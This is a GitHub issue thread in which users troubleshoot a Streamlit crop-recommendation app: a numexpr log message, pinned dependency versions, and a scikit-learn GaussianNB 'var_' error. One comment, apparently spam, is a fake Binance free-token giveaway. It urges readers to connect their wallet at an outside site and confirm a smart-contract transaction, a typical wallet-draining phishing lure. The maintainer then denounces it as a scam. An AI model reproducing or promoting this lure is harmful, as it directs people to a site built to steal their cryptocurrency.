### ISSUE TITLE
INFO    numexpr.utils: NumExpr defaulting to 8 threads.

### ISSUE THREAD

**Issue by KeertiAdapa** [gabbygab1233/Crop-Recommendation#2]
[crop_streamlit.md](https://github.com/gabbygab1233/Crop-Recommender/files/8360224/crop_streamlit.md)

**Comment by gabbygab1233** [comment]
Hi, I try to pull this repository and it works fine for me. Can you please elaborate more on the problem? running the "streamlit run app.py" cause you an error? or while installing the dependencies?

![crop_recom](https://user-images.githubusercontent.com/37177883/160651478-2663fcbf-3c0f-4168-b5ce-f6753866ad8b.png)

**Comment by KeertiAdapa** [comment]
running the app.py caused a problem. when debugged I'm getting an error stating: " INFO numexpr.utils: NumExpr defaulting to 8 threads."
Is this error related to installing any dependencies

**Comment by gabbygab1233** [comment]
Try uninstall the numexpr and update ur python version to 3.8 then update all the dependencies and install again the numexpr

plotly==4.5.0
pandas_profiling==2.3.0
streamlit==0.79.0
matplotlib==3.3.0
pandas==1.0.5
seaborn==0.10.1
numpy==1.18.5
scikit_learn==1.0.2

I prefer to show me the screenshot of error instead of text.

**Comment by KeertiAdapa** [comment]
Okay sir, we once again try installing it.

Attached the screenshot too sir
[
<img width="1440" alt="Screenshot 2022-03-31 at 2 13 06 PM" src="https://user-images.githubusercontent.com/102224724/161014757-70ff3785-57a1-4d63-9767-1fc050db4e93.png">
](url)

**Comment by gabbygab1233** [comment]
Don't run it on Jupyter notebook. Try to run it on ur cmd or terminal.

**streamlit run app.py**

**Comment by KeertiAdapa** [comment]
Thanks a lot sir! Site is working now.
But not predicting the crop
<img width="1440" alt="Screenshot 2022-04-01 at 2 10 44 PM" src="https://user-images.githubusercontent.com/102224724/161227967-4a4f564d-fff9-4b74-a1f5-07de59cbd468.png">
.

**Comment by ghost** [comment]
2022-05-10 10:40:24.357 Traceback (most recent call last):
  File "C:\Users\2019PECCS117\AppData\Local\Programs\Python\Python310\lib\site-packages\streamlit\scriptrunner\script_runner.py", line 475, in _run_script
    exec(code, module.__dict__)
  File "C:\Users\2019PECCS117\Desktop\Crop-Recommender-main\app.py", line 77, in <module>
    main()
  File "C:\Users\2019PECCS117\Desktop\Crop-Recommender-main\app.py", line 55, in main
    prediction = loaded_model.predict(single_pred)
  File "C:\Users\2019PECCS117\AppData\Local\Programs\Python\Python310\lib\site-packages\sklearn\utils\metaestimators.py", line 113, in <lambda>
    out = lambda *args, **kwargs: self.fn(obj, *args, **kwargs)  # noqa
  File "C:\Users\2019PECCS117\AppData\Local\Programs\Python\Python310\lib\site-packages\sklearn\pipeline.py", line 470, in predict
    return self.steps[-1][1].predict(Xt, **predict_params)
  File "C:\Users\2019PECCS117\AppData\Local\Programs\Python\Python310\lib\site-packages\sklearn\naive_bayes.py", line 83, in predict
    jll = self._joint_log_likelihood(X)
  File "C:\Users\2019PECCS117\AppData\Local\Programs\Python\Python310\lib\site-packages\sklearn\naive_bayes.py", line 489, in _joint_log_likelihood
    n_ij = -0.5 * np.sum(np.log(2.0 * np.pi * self.var_[i, :]))
AttributeError: 'GaussianNB' object has no attribute 'var_'


how to rectify  #it

**Comment by gabbygab1233** [comment]
Hi, try to train and use other model.

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by gabbygab1233** [comment]
@gqgserver 

Scamming does not work here; we're not gullible. Trying to deceive during the holidays reveals desperation for money. I condemn your actions, and I hope that for every person you target, someone in your own family doesn't suffer a tragic fate.
